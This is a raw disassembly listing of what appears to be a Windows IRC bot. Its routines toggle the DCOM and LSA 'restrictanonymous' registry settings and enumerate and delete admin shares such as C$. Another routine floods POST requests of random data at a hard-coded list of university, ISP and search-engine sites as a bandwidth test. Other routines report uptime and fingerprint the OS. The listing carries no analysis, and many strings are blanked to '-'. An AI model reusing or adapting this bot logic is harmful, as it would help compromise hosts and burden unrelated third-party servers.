var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_4CBAA4, edi
jnz loc_41A4F8
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A451
mov ax, word_439298
mov word ptr [ebp+Str+2], ax
lea eax, [ebp+Str+2]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A433
push offset dword_43A7C0
jmp short loc_41A438
; ---------------------------------------------------------------------------
loc_41A433: ; CODE XREF: sub_41A3C6+64�j
push offset asc_43A7A0 ; "-"
loc_41A438: ; CODE XREF: sub_41A3C6+6B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A464
; ---------------------------------------------------------------------------
loc_41A451: ; CODE XREF: sub_41A3C6+36�j
lea eax, [ebp+Dest]
push offset asc_43A770 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A464: ; CODE XREF: sub_41A3C6+89�j
cmp [ebp+arg_C], edi
jnz short loc_41A483
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A483: ; CODE XREF: sub_41A3C6+A1�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A4F1
lea eax, [ebp+Str]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], 1
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A4D3
push offset dword_43A720
jmp short loc_41A4D8
; ---------------------------------------------------------------------------
loc_41A4D3: ; CODE XREF: sub_41A3C6+104�j
push offset asc_43A6EC ; "-"
loc_41A4D8: ; CODE XREF: sub_41A3C6+10B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A50B
; ---------------------------------------------------------------------------
loc_41A4F1: ; CODE XREF: sub_41A3C6+E2�j
push offset dword_43A6B0
jmp short loc_41A4FD
; ---------------------------------------------------------------------------
loc_41A4F8: ; CODE XREF: sub_41A3C6+13�j
push offset asc_43A680 ; "-"
loc_41A4FD: ; CODE XREF: sub_41A3C6+130�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A50B: ; CODE XREF: sub_41A3C6+129�j
cmp [ebp+arg_C], edi
jnz short loc_41A52A
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A52A: ; CODE XREF: sub_41A3C6+148�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
cmp dword_4CBACC, edi
pop ecx
jnz loc_41A6A5
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41A54D: ; CODE XREF: sub_41A3C6+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Str]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_4CB918
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41A5EA
cmp eax, 0EAh
jz short loc_41A5EA
mov esi, offset off_43A548
loc_41A57E: ; CODE XREF: sub_41A3C6+21D�j
push dword ptr [esi]
push edi
call sub_4191B8
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_41A595
push offset dword_43A65C
jmp short loc_41A59A
; ---------------------------------------------------------------------------
loc_41A595: ; CODE XREF: sub_41A3C6+1C6�j
push offset asc_43A630 ; "-"
loc_41A59A: ; CODE XREF: sub_41A3C6+1CD�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41A5CD
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A5CD: ; CODE XREF: sub_41A3C6+1EB�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esi, 8
pop ecx
cmp esi, offset dword_43A568
jb short loc_41A57E
jmp loc_41A682
; ---------------------------------------------------------------------------
loc_41A5EA: ; CODE XREF: sub_41A3C6+1AA�j
; sub_41A3C6+1B1�j
mov esi, dword ptr [ebp+Str]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_41A679
loc_41A5F9: ; CODE XREF: sub_41A3C6+2AF�j
mov edi, [esi]
push edi ; Str
call _wcslen
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41A66E
push edi
call sub_4190A5
push eax
push 0
call sub_4191B8
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41A628
push offset dword_43A60C
jmp short loc_41A62D
; ---------------------------------------------------------------------------
loc_41A628: ; CODE XREF: sub_41A3C6+259�j
push offset asc_43A5E0 ; "-"
loc_41A62D: ; CODE XREF: sub_41A3C6+260�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41A661
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A661: ; CODE XREF: sub_41A3C6+27F�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
loc_41A66E: ; CODE XREF: sub_41A3C6+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41A5F9
xor edi, edi
loc_41A679: ; CODE XREF: sub_41A3C6+22D�j
push dword ptr [ebp+Str]
call dword_4CBA64
loc_41A682: ; CODE XREF: sub_41A3C6+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41A54D
lea eax, [ebp+Dest]
push offset asc_43A5B8 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
pop ebx
jmp short loc_41A6B8
; ---------------------------------------------------------------------------
loc_41A6A5: ; CODE XREF: sub_41A3C6+177�j
lea eax, [ebp+Dest]
push offset asc_43A588 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A6B8: ; CODE XREF: sub_41A3C6+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_41A6D6
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A6D6: ; CODE XREF: sub_41A3C6+2F5�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_41A3C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6EA proc near ; CODE XREF: sub_41A366:loc_41A3AD�p
Dest = byte ptr -220h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_4CBAA4, ebx
push esi
jnz loc_41A818
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A775
mov ax, word_4392DC
mov word ptr [ebp+Str+2], ax
lea eax, [ebp+Str+2]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A757
push offset dword_43A938
jmp short loc_41A75C
; ---------------------------------------------------------------------------
loc_41A757: ; CODE XREF: sub_41A6EA+64�j
push offset asc_43A91C ; "-"
loc_41A75C: ; CODE XREF: sub_41A6EA+6B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A788
; ---------------------------------------------------------------------------
loc_41A775: ; CODE XREF: sub_41A6EA+36�j
lea eax, [ebp+Dest]
push offset asc_43A770 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A788: ; CODE XREF: sub_41A6EA+89�j
cmp [ebp+arg_C], ebx
jnz short loc_41A7A7
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A7A7: ; CODE XREF: sub_41A6EA+A1�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A811
lea eax, [ebp+Str]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], ebx
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A7F3
push offset dword_43A8DC
jmp short loc_41A7F8
; ---------------------------------------------------------------------------
loc_41A7F3: ; CODE XREF: sub_41A6EA+100�j
push offset asc_43A8A4 ; "-"
loc_41A7F8: ; CODE XREF: sub_41A6EA+107�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A82B
; ---------------------------------------------------------------------------
loc_41A811: ; CODE XREF: sub_41A6EA+E2�j
push offset dword_43A868
jmp short loc_41A81D
; ---------------------------------------------------------------------------
loc_41A818: ; CODE XREF: sub_41A6EA+13�j
push offset asc_43A680 ; "-"
loc_41A81D: ; CODE XREF: sub_41A6EA+12C�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A82B: ; CODE XREF: sub_41A6EA+125�j
cmp [ebp+arg_C], ebx
jnz short loc_41A84A
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A84A: ; CODE XREF: sub_41A6EA+144�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
cmp dword_4CBACC, ebx
pop ecx
jnz loc_41A9BF
push edi
mov esi, offset off_43A548
mov edi, 200h
loc_41A86E: ; CODE XREF: sub_41A6EA+1E9�j
push dword ptr [esi+4] ; int
push dword ptr [esi] ; Str
push ebx ; int
call sub_41910C
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41A889
push offset dword_43A848
jmp short loc_41A88E
; ---------------------------------------------------------------------------
loc_41A889: ; CODE XREF: sub_41A6EA+196�j
push offset asc_43A820 ; "-"
loc_41A88E: ; CODE XREF: sub_41A6EA+19D�j
lea eax, [ebp+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41A8BD
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A8BD: ; CODE XREF: sub_41A6EA+1B7�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esi, 8
pop ecx
cmp esi, offset off_43A558
jb short loc_41A86E
call ds:dword_427198 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_41A9A7
loc_41A8E8: ; CODE XREF: sub_41A6EA+2B7�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_41A99C
cmp bl, 41h
jz loc_41A99C
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_0 ; "%c:\\"
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_20]
push eax
call dword_4CBA34 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41A99C
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_14]
push eax ; Str
push 0 ; int
call sub_41910C
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41A95A
push offset dword_43A848
jmp short loc_41A95F
; ---------------------------------------------------------------------------
loc_41A95A: ; CODE XREF: sub_41A6EA+267�j
push offset asc_43A820 ; "-"
loc_41A95F: ; CODE XREF: sub_41A6EA+26E�j
lea eax, [ebp+Dest]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41A98F
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A98F: ; CODE XREF: sub_41A6EA+289�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
loc_41A99C: ; CODE XREF: sub_41A6EA+206�j
; sub_41A6EA+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_41A8E8
loc_41A9A7: ; CODE XREF: sub_41A6EA+1F8�j
lea eax, [ebp+Dest]
push offset asc_43A7F0 ; "-"
push eax ; Dest
call _sprintf
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_41A9D2
; ---------------------------------------------------------------------------
loc_41A9BF: ; CODE XREF: sub_41A6EA+173�j
lea eax, [ebp+Dest]
push offset asc_43A588 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A9D2: ; CODE XREF: sub_41A6EA+2D3�j
cmp [ebp+arg_C], ebx
jnz short loc_41A9F0
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_41A9F0: ; CODE XREF: sub_41A6EA+2EB�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_41A6EA endp
; =============== S U B R O U T I N E =======================================
sub_41AA04 proc near ; CODE XREF: sub_41ABFB+CB�p
; sub_41ABFB+DD�p ...
arg_0 = dword ptr 4
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41AA04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41AA1E(char *Str)
sub_41AA1E proc near ; CODE XREF: sub_41ABFB+D4�p
; sub_41ABFB+E6�p ...
var_38 = dword ptr -38h
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Source = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
mov esi, 0FFh
pop ecx
cmp eax, esi
ja loc_41ABF7
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
push [ebp+Str]
mov [ebp+Dst], 2
call sub_40A8F0
add esp, 10h
mov [ebp+var_24], eax
test eax, eax
jz loc_41ABF7
push 50h
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41ABF7
lea ecx, [ebp+Dst]
push 10h
push ecx
push eax
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_41ABF7
push 32003h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov edi, ds:dword_4270B0
mov ebx, eax
pop ecx
mov [ebp+Source], ebx
call edi ; GetTickCount
push eax ; Size
call sub_41C2B8
call _rand
cdq
idiv esi
mov [esp+38h+var_38], 32001h
push 0 ; Val
push ebx ; Dst
movsx esi, dl
call _memset
push 32000h ; Size
push esi ; Val
push ebx ; Dst
call _memset
push ebx ; Str
call _strlen
push 323EAh ; unsigned int
mov ebx, eax
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 20h
mov esi, eax
push ebx
push [ebp+Str]
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi ; Dest
call _sprintf
push [ebp+Source] ; Source
push esi ; Dest
call _strcat
push offset asc_4349EC ; "\r\n"
push esi ; Dest
call _strcat
push esi ; Str
call _strlen
mov ebx, eax
add esp, 24h
mov [ebp+var_10], ebx
call edi ; GetTickCount
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test ebx, ebx
mov [ebp+Str], eax
jbe short loc_41AB77
mov [ebp+var_C], ebx
mov ebx, 400h
jmp short loc_41AB47
; ---------------------------------------------------------------------------
loc_41AB44: ; CODE XREF: sub_41AA1E+157�j
mov eax, [ebp+Str]
loc_41AB47: ; CODE XREF: sub_41AA1E+124�j
mov ecx, [ebp+var_10]
push 0
sub ecx, eax
cmp ecx, ebx
jnb short loc_41AB57
push [ebp+var_C]
jmp short loc_41AB58
; ---------------------------------------------------------------------------
loc_41AB57: ; CODE XREF: sub_41AA1E+132�j
push ebx
loc_41AB58: ; CODE XREF: sub_41AA1E+137�j
add eax, esi
push eax
push [ebp+var_4]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41ABDE
add [ebp+Str], ebx
sub [ebp+var_C], ebx
mov eax, [ebp+Str]
cmp eax, [ebp+var_10]
jb short loc_41AB44
loc_41AB77: ; CODE XREF: sub_41AA1E+11A�j
call edi ; GetTickCount
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul ds:flt_4276F4
fst [ebp+Str]
fcomp ds:flt_4276F0
fnstsw ax
sahf
jnz short loc_41AB9F
fld1
fstp [ebp+Str]
loc_41AB9F: ; CODE XREF: sub_41AA1E+17A�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+Source]
call sub_41BA91
push esi
call sub_41BA91
mov eax, [ebp+var_10]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+Str]
fmul ds:flt_4276EC
fmul ds:flt_4276E8
call __ftol
loc_41ABD9: ; CODE XREF: sub_41AA1E+1DB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41ABDE: ; CODE XREF: sub_41AA1E+149�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+Source]
call sub_41BA91
push esi
call sub_41BA91
pop ecx
pop ecx
loc_41ABF7: ; CODE XREF: sub_41AA1E+19�j
; sub_41AA1E+42�j ...
xor eax, eax
jmp short loc_41ABD9
sub_41AA1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41ABFB(int,char *Str,int)
sub_41ABFB proc near ; CODE XREF: sub_401ACD+2E1E�p
Dest = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41AA04
push [ebp+eax*4+var_3C] ; Str
call sub_41AA1E
push 8
mov esi, eax
call sub_41AA04
push [ebp+eax*4+var_3C] ; Str
call sub_41AA1E
add esp, 10h
test esi, esi
jz short loc_41ACFC
test eax, eax
jz short loc_41ACF8
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41ACFE
; ---------------------------------------------------------------------------
loc_41ACF8: ; CODE XREF: sub_41ABFB+F4�j
mov ebx, esi
jmp short loc_41ACFE
; ---------------------------------------------------------------------------
loc_41ACFC: ; CODE XREF: sub_41ABFB+F0�j
mov ebx, eax
loc_41ACFE: ; CODE XREF: sub_41ABFB+FB�j
; sub_41ABFB+FF�j
push 0Ch
call sub_41AA04
push [ebp+eax*4+var_6C] ; Str
call sub_41AA1E
push 0Ch
mov edi, eax
call sub_41AA04
push [ebp+eax*4+var_6C] ; Str
call sub_41AA1E
add esp, 10h
test edi, edi
jz short loc_41AD36
test eax, eax
jz short loc_41AD32
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41AD38
; ---------------------------------------------------------------------------
loc_41AD32: ; CODE XREF: sub_41ABFB+12E�j
mov esi, edi
jmp short loc_41AD38
; ---------------------------------------------------------------------------
loc_41AD36: ; CODE XREF: sub_41ABFB+12A�j
mov esi, eax
loc_41AD38: ; CODE XREF: sub_41ABFB+135�j
; sub_41ABFB+139�j
push 6
call sub_41AA04
push [ebp+eax*4+var_1C] ; Str
call sub_41AA1E
push 6
mov edi, eax
call sub_41AA04
push [ebp+eax*4+var_1C] ; Str
call sub_41AA1E
add esp, 10h
test edi, edi
jz short loc_41AD70
test eax, eax
jz short loc_41AD6C
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41AD72
; ---------------------------------------------------------------------------
loc_41AD6C: ; CODE XREF: sub_41ABFB+168�j
mov ecx, edi
jmp short loc_41AD72
; ---------------------------------------------------------------------------
loc_41AD70: ; CODE XREF: sub_41ABFB+164�j
mov ecx, eax
loc_41AD72: ; CODE XREF: sub_41ABFB+16F�j
; sub_41ABFB+173�j
xor eax, eax
test ebx, ebx
jz short loc_41AD7F
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41AD82
; ---------------------------------------------------------------------------
loc_41AD7F: ; CODE XREF: sub_41ABFB+17B�j
push 2
pop edi
loc_41AD82: ; CODE XREF: sub_41ABFB+182�j
test esi, esi
jz short loc_41AD8A
add eax, esi
jmp short loc_41AD8B
; ---------------------------------------------------------------------------
loc_41AD8A: ; CODE XREF: sub_41ABFB+189�j
dec edi
loc_41AD8B: ; CODE XREF: sub_41ABFB+18D�j
test ecx, ecx
jz short loc_41AD93
add eax, ecx
jmp short loc_41AD94
; ---------------------------------------------------------------------------
loc_41AD93: ; CODE XREF: sub_41ABFB+192�j
dec edi
loc_41AD94: ; CODE XREF: sub_41ABFB+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+Dest]
push offset asc_43A990 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41ABFB endp
; =============== S U B R O U T I N E =======================================
sub_41ADD8 proc near ; CODE XREF: sub_401ACD+257B�p
; sub_401ACD+29CD�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset byte_4DBC90
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41ADD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE41 proc near ; CODE XREF: sub_4172C1+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_4270D0 ; GetVersionExA
test eax, eax
jz short loc_41AED4
cmp [ebp+var_90], 4
jnz short loc_41AEAA
cmp [ebp+var_8C], esi
jnz short loc_41AE92
cmp [ebp+var_84], 1
jnz short loc_41AE85
push 1
pop esi
loc_41AE85: ; CODE XREF: sub_41AE41+3F�j
cmp [ebp+var_84], 2
jnz short loc_41AED4
push 1
jmp short loc_41AED3
; ---------------------------------------------------------------------------
loc_41AE92: ; CODE XREF: sub_41AE41+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41AE9F
loc_41AE9B: ; CODE XREF: sub_41AE41+78�j
push 2
jmp short loc_41AED3
; ---------------------------------------------------------------------------
loc_41AE9F: ; CODE XREF: sub_41AE41+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_41AED4
jmp short loc_41AEC4
; ---------------------------------------------------------------------------
loc_41AEAA: ; CODE XREF: sub_41AE41+2E�j
cmp [ebp+var_90], 5
jnz short loc_41AED4
cmp [ebp+var_8C], esi
jz short loc_41AE9B
cmp [ebp+var_8C], 1
jnz short loc_41AEC8
loc_41AEC4: ; CODE XREF: sub_41AE41+67�j
push 3
jmp short loc_41AED3
; ---------------------------------------------------------------------------
loc_41AEC8: ; CODE XREF: sub_41AE41+81�j
cmp [ebp+var_8C], 2
jnz short loc_41AED4
push 7
loc_41AED3: ; CODE XREF: sub_41AE41+4F�j
; sub_41AE41+5C�j ...
pop esi
loc_41AED4: ; CODE XREF: sub_41AE41+25�j
; sub_41AE41+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_41AE41 endp
; =============== S U B R O U T I N E =======================================
sub_41AED9 proc near ; CODE XREF: sub_41AF8F+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41AEE1: ; CODE XREF: sub_41AED9+2F�j
; sub_41AED9+35�j
rdtsc
push 3E8h
mov edi, edx
